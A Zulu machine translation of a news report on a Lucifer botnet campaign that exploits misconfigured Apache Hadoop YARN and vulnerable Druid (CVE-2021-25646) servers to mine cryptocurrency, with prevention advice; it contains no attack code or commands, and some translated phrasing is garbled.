Umlingisi osongelayo uqondise izinhlangano ezisebenzisa ubuchwepheshe bedatha ye-Apache Hadoop ne-Apache Druid enenguqulo entsha ye-Lucifer botnet, ithuluzi elaziwayo lohlelo olungayilungele ikhompuyutha elihlanganisa amakhono okuntshontsha nokuphikiswa kwesevisi (DDoS) asabalalisiwe.
Lo mkhankaso ungowokusuka kwe-botnet, futhi ukuhlaziya kuleli sonto okuvela kwa-Aqua Nautilus kuphakamisa ukuthi abaqhubi bayo bahlola izindlela ezintsha zokutheleleka njengesandulela somkhankaso obanzi.
I-Lucifer iyi-malware ezisakaza yona abacwaningi bakwa-Palo Alto Networks baqala ukuyibika ngoMeyi 2020. Ngaleso sikhathi, inkampani yachaza usongo njenge-malware eyi-hybrid eyingozi umhlaseli angasebenzisa ukunika amandla ukuhlasela kwe-DDoS, noma ukuwisa i-XMRig yezimayini i-cryptocurrency ye-Monero. UPalo Alto uthe sekwenzekile babone abahlaseli besebenzisa uLusifa ukulahla okuputshuziwe kwe-NSA I-EternalBlue, i-EternalRomance, ne-DoublePulsar uhlelo olungayilungele ikhompuyutha kanye nokuxhashazwa ezinhlelweni eziqondiwe.
"I-Lucifer iyinhlanganisela entsha ye-cryptojacking kanye ne-DDoS ehlukile yohlelo olungayilungele ikhompuyutha esebenzisa ubungozi obudala ukuze basakaze futhi benze imisebenzi enonya ezisekelweni ze-Windows," u-Palo Alto wayexwayise ngaleso sikhathi.
Manje, isibuyile futhi iqondise amaseva e-Apache. Abacwaningi bakwa-Aqua Nautilus abebewuqaphile lo mkhankaso kusho kubhulogi kuleli sonto base bebala ukuhlaselwa okuyingqayizivele okungaphezu kuka-3,000 okuqondiswe kuma-honeypots enkampani i-Apache Hadoop, i-Apache Druid, ne-Apache Flink ngenyanga edlule nje kuphela.
Izigaba Zokuhlasela Eziyingqayizivele zika-Lucifer
Umkhankaso ubulokhu uqhubeka okungenani izinyanga eziyisithupha, phakathi nalesi sikhathi abahlaseli bebezama ukuxhaphaza ukulungisa okungalungile okwaziwayo nokuba sengozini ezinkundleni zomthombo ovulekile ukuze balethe umthwalo wabo wokukhokhelwa.
Lo mkhankaso kuze kube manje uhlanganiswe izigaba ezintathu ezihlukene, abacwaningi abathi cishe ziyinkomba yokuthi isitha sihlola amasu okugwema ukuzivikela ngaphambi kokuhlasela okuphelele.
"Umkhankaso waqala ukubhekisa amabhodwe ethu oju ngoJulayi," kusho uNitzan Yaakov, umhlaziyi wedatha yezokuphepha kwa-Aqua Nautilus. "Ngesikhathi sophenyo lwethu, sibone umhlaseli ebuyekeza amasu nezindlela zokufeza inhloso enkulu yokuhlasela - i-cryptocurrency yezimayini."
Phakathi nesigaba sokuqala somkhankaso omusha, abacwaningi be-Aqua babone abahlaseli beskena i-inthanethi ukuze bathole izimo ze-Hadoop ezingalungiselelwe kahle. Lapho bethola i-Hadoop YARN engalungiselelwe kahle (Yet Another Resource Negotiator) ukuphathwa kwensiza yeqoqo kanye nobuchwepheshe bokuhlela umsebenzi ku-honeypot ye-Aqua, baqondise leso senzakalo ukuze baxhaphaze. Isenzakalo esingahlelwanga kahle ku-honeypot ye-Aqua sasihlobene nomphathi wezisetshenziswa ze-Hadoop YARN futhi sanikeza abahlaseli indlela yokwenza ikhodi engafanele kuso ngesicelo se-HTTP esakhiwe ngokukhethekile.
Abahlaseli basebenzise ukungalungiseki kahle ukuze balande i-Lucifer, bayenze futhi bayigcine kunkomba yendawo yesibonelo se-Hadoop YARN. Babe sebeqinisekisa ukuthi uhlelo olungayilungele ikhompuyutha lusetshenziswa ngesikhathi esihleliwe ukuze kuqinisekiswe ukuphikelela. I-Aqua iphinde yabona umhlaseli esusa kanambambili endleleni lapho yayilondolozwe khona ekuqaleni ukuze izame ukubalekela ukutholwa.
Esigabeni sesibili sokuhlasela, abalingisi abasabisayo baphinde bakhomba ukungalungiseki kahle kusitaki sedatha enkulu ye-Hadoop ukuze bazame ukuthola ukufinyelela kokuqala. Nokho, kulokhu, esikhundleni sokulahla kanambambili eyodwa, abahlaseli balahle ababili ohlelweni olusengozini - oyedwa owabulala uLucifer kanti omunye ngokusobala angenzanga lutho.
Esigabeni sesithathu, umhlaseli ushintshe amaqhinga futhi, esikhundleni sokukhomba izimo ze-Apache Hadoop ezingalungiselelwe kahle, waqala ukufuna ababungazi be-Apache Druid abasengozini. Inguqulo ye-Aqua yesevisi ye-Apache Druid ebhodweni layo lezinyosi ayizange ishicilelwe I-CVE-2021-25646, ukuba sengozini komjovo womyalo kuzinguqulo ezithile zesizindalwazi sezibalo zokusebenza okuphezulu. Ukuba sengozini kunikeza abahlaseli abagunyaziwe indlela yokusebenzisa ikhodi ye-JavaScript echazwe umsebenzisi kumasistimu athintekile.
Umhlaseli usebenzise iphutha ukuze afake umyalo wokulanda ama-binaries amabili futhi akwazi ukufunda, ukubhala, nokukhipha izimvume zabo bonke abasebenzisi, kusho u-Aqua. Enye yamabhanari iqalise ukudawuniloda kwe-Lucifer, kuyilapho enye yenze uhlelo olungayilungele ikhompyutha. Kulesi sigaba, isinqumo somhlaseli sokuhlukanisa ukulandwa nokwenziwa kwe-Lucifer phakathi kwamafayela kanambambili amabili kubonakala kuwumzamo wokudlula izindlela zokutholwa, kuphawulwe umdayisi wezokuphepha.
Ungakugwema Kanjani I-Cyberattack Yesihogo ku-Apache Big Data
Ngaphambi kwegagasi elizayo lokuhlasela ngokumelene nezimo ze-Apache, amabhizinisi kufanele abuyekeze izinyathelo zawo ukuze alungise kahle okuvamile, futhi aqinisekise ukuthi konke ukuchibiyela kuhambisana nesikhathi.
Ngaphandle kwalokho, abacwaningi baphawule ukuthi "izinsongo ezingaziwa zingabonakala ngokuskena indawo yakho ngokutholwa kwesikhathi sokusebenza kanye nezixazululo zokuphendula, ezingathola ukuziphatha okuhlukile futhi uqaphele ngakho," nokuthi "kubalulekile ukuqapha nokwazi izinsongo ezikhona usebenzisa imitapo yolwazi yemithombo evulekile. Wonke umtapo wezincwadi namakhodi kufanele alandwe kumsabalalisi oqinisekisiwe.”
- I-SEO Powered Content & PR Distribution. Khuliswa Namuhla.
- I-PlatoData.Network Vertical Generative Ai. Zinike Amandla. Finyelela Lapha.
- I-PlatoAiStream. I-Web3 Intelligence. Ulwazi Lukhulisiwe. Finyelela Lapha.
- I-PlatoESG. Ikhabhoni, I-CleanTech, Amandla, Environment, Ilanga, Ukuphathwa Kwemfucuza. Finyelela Lapha.
- I-PlatoHealth. I-Biotech kanye ne-Clinical Trials Intelligence. Finyelela Lapha.
- Source: https://www.darkreading.com/cloud-security/lucifer-botnet-heat-apache-hadoop-servers
